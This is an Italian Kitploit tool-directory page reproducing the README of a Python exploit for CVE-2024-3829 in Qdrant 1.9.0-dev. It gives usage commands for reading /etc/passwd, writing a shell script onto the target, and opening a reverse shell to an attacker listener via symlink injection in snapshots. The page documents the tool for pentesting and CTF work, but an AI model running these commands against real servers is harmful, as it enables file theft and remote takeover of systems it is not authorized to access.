Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3829 — Exploit Python per CVE-2024-3829 che colpisce l'importazione/esportazione di snapshot di Qdrant, consentendo lettura di file, scrittura di file ed esecuzione di reverse shell tramite iniezione di symlink. | Kitploit
Strumenti/GitHubGitHub/fabse-hack/cve-2024-3829
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingSviluppo Payload
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

Exploit Python per CVE-2024-3829 che colpisce l'importazione/esportazione di snapshot di Qdrant, consentendo lettura di file, scrittura di file ed esecuzione di reverse shell tramite iniezione di symlink.

Vedi Repository
132 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3829 per Qdrant - Exploit

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

Questo repository documenta e dimostra CVE-2024-3829 per qdrant/qdrant (v1.9.0-dev)

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • Ulteriori informazioni e idea per questo repository:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

Supporto e donazioni

Paypal:

Buy Me a Coffee:

Panoramica

La vulnerabilità consente la manipolazione degli archivi di snapshot tramite trucchi con symlink/percorsi. Ciò abilita due classi di impatto e una reverse shell hahhaa:

  1. Lettura di file
  2. Scrittura di file
  3. Esegui reverse shell

A seconda dell'ambiente, le primitive di scrittura file possono portare all'esecuzione di codice.

Software interessato (vedi il link NVD)

  • Prodotto: Qdrant
  • Versione: 1.9.0-dev
  • Componente: Snapshot Import/Export

Nota sul numero di versione:

Questa versione non è più disponibile nel world wide web (alcuni lo chiamano "internet").
Nel repository di qdrant, il report NVD Nist indicava il commit, che è la v1.9.0-dev vulnerabile.
Se vuoi installare questa versione per CTF / altri scopi su un docker, usa:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

Flusso di lavoro (Semplificato)

  1. Crea una collection
  2. Genera uno snapshot
  3. Estrai e modifica lo snapshot localmente
  4. Inietta un symlink nell'archivio target di lettura/scrittura
  5. Carica lo snapshot modificato
  6. Attiva il ripristino dello snapshot
  7. Valuta il risultato leggi contenuto file / scrivi file / esegui reverse shell

Contenuto del repository

  • cve_2024_3829.py - Exploit per il flusso di lettura/scrittura/trigger
  • requirements.txt - Dipendenze Python

Requisiti

  • Sistema Kali Linux consigliato
  • Python 3.10+
  • Server Qdrant in esecuzione per test locali
  • Pacchetto Python requests

Installazione:

root@kitploit:~
python3 -m pip install -r requirements.txt

Utilizzo

Mostra tutte le opzioni:

root@kitploit:~
python3 cve_2024_3829.py -h

Esempi:

root@kitploit:~
# Read mode
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# Write mode
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# Reverse shell mode
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

Parametri disponibili

  • -h, --help: mostra l'aiuto della CLI
  • -m, --mode: uno tra read, write, reverse_shell (obbligatorio)
    parametri del target:
  • -tu, --target_url: URL base di Qdrant (default nello script)
  • -tp, --target_port: porta del target Qdrant (default: 6333)
  • -tpath, --target_path: percorso remoto del target (default: /etc/)
  • -tf, --target_file_name: nome del file remoto del target (default: passwd)
    parametri dell'attaccante:
  • -ai, --attacker_ip: IP di callback/listener per la modalità reverse shell
  • -ap, --attacker_port: porta di callback/listener (default: 9001)
  • -apath, --attacker_path: percorso locale del file dell'attaccante per la modalità write (default: /tmp/)
  • -af, --attacker_file_name: nome del file utilizzato sul target in modalità write (default: shell.sh)

Note

  • --target_url dovrebbe essere l'URL base senza la porta finale se passi --target_port separatamente, perché lo script costruisce gli URL come <url>:<target_port>/....
  • In modalità read, lo script combina --target_path e --target_file_name (ad esempio /etc/ + passwd).
  • In modalità write, --attacker_path deve puntare a un file locale esistente e --attacker_file_name definisce il nome remoto del file.
  • Per test di rete attraverso i confini Docker/WSL/host, verifica prima la raggiungibilità (ad esempio con netcat) prima di eseguire la modalità trigger.
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
Scarica lo strumento